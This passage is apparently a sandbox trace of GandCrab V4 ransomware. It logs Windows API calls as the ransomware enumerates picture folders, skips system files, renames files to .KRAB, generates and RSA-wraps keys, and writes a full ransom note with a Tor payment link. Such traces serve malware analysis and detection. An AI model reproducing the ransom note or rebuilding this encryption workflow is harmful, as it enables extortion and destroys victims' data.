[0098.031] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xcee9, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xcee9, lpOverlapped=0x0) returned 1 [0098.032] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0098.032] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.050] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.050] CloseHandle (hObject=0x3a8) returned 1 [0098.050] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.051] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\ZsJz1BZJohs.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\zsjz1bzjohs.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\ZsJz1BZJohs.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\zsjz1bzjohs.png.krab")) returned 1 [0098.051] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.052] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0098.052] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0098.052] CloseHandle (hObject=0x434) returned 1 [0098.052] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.052] lstrcmpW (lpString1="Saved Pictures", lpString2=".") returned 1 [0098.052] lstrcmpW (lpString1="Saved Pictures", lpString2="..") returned 1 [0098.052] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="Saved Pictures" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures" [0098.052] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\" [0098.052] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0098.052] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0098.052] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0098.052] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0098.052] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0098.052] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.053] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.053] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\\\KRAB-DECRYPT.txt") returned 63 [0098.053] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\saved pictures\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.054] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0098.054] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0098.054] CloseHandle (hObject=0x434) returned 1 [0098.054] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.055] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.055] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2d, wMilliseconds=0xfe)) [0098.055] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.055] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0098.055] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0098.055] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a08d2ca4dee3d.lock") returned 69 [0098.055] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\saved pictures\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0098.061] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.061] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.061] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\") returned 46 [0098.061] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\*" [0098.061] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbd7a0 [0098.061] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0098.061] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0098.061] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0098.062] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0098.062] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0098.062] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0098.062] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0098.062] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a08d2ca4dee3d.lock" [0098.062] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.062] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 74 [0098.062] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\d2ca4a08d2ca4dee3d.lock") returned 69 [0098.062] lstrlenW (lpString=".lock") returned 5 [0098.062] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.062] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0098.062] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.062] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.062] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0098.063] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0098.063] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0098.063] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini" [0098.063] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.063] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini.KRAB") returned 62 [0098.063] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini") returned 57 [0098.063] lstrlenW (lpString=".ini") returned 4 [0098.063] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.063] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0098.063] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.063] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini") returned 57 [0098.063] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\desktop.ini") returned 57 [0098.063] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0098.063] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.064] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0098.064] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0098.064] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0098.064] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\KRAB-DECRYPT.txt" [0098.064] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.064] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\KRAB-DECRYPT.txt.KRAB") returned 67 [0098.064] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\KRAB-DECRYPT.txt") returned 62 [0098.064] lstrlenW (lpString=".txt") returned 4 [0098.064] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.064] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0098.064] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.064] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\KRAB-DECRYPT.txt") returned 62 [0098.064] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\KRAB-DECRYPT.txt") returned 62 [0098.064] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0098.064] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0098.064] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0098.065] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0098.065] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0098.065] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0098.065] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0098.065] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0098.065] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0098.065] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0098.065] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.065] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0098.065] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0098.065] CloseHandle (hObject=0x434) returned 1 [0098.065] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.065] lstrcmpW (lpString1="ukEE7sv0fc.jpg", lpString2=".") returned 1 [0098.065] lstrcmpW (lpString1="ukEE7sv0fc.jpg", lpString2="..") returned 1 [0098.065] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="ukEE7sv0fc.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\ukEE7sv0fc.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\ukEE7sv0fc.jpg" [0098.065] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.065] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\ukEE7sv0fc.jpg.KRAB") returned 50 [0098.065] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\ukEE7sv0fc.jpg") returned 45 [0098.065] lstrlenW (lpString=".jpg") returned 4 [0098.066] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.066] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".jpg ") returned 5 [0098.066] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.066] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\ukEE7sv0fc.jpg") returned 45 [0098.066] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\ukEE7sv0fc.jpg") returned 45 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="desktop.ini") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="autorun.inf") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="ntuser.dat") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="iconcache.db") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="bootsect.bak") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="boot.ini") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="ntuser.dat.log") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="thumbs.db") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="ntldr") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="NTDETECT.COM") returned 1 [0098.066] lstrcmpiW (lpString1="ukEE7sv0fc.jpg", lpString2="Bootfont.bin") returned 1 [0098.066] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.066] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0098.067] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.067] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.067] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.067] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.067] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.067] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.067] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0098.068] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.068] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.068] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.068] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.068] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.068] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.069] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10110a0) returned 1 [0098.069] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0098.069] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.069] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.069] GetLastError () returned 0x0 [0098.069] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0098.069] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0098.069] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10114e0) returned 1 [0098.069] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd5a0) returned 1 [0098.069] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.069] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.070] GetLastError () returned 0x0 [0098.070] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0098.070] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0098.070] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\ukEE7sv0fc.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\ukee7sv0fc.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.070] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.070] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.071] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, 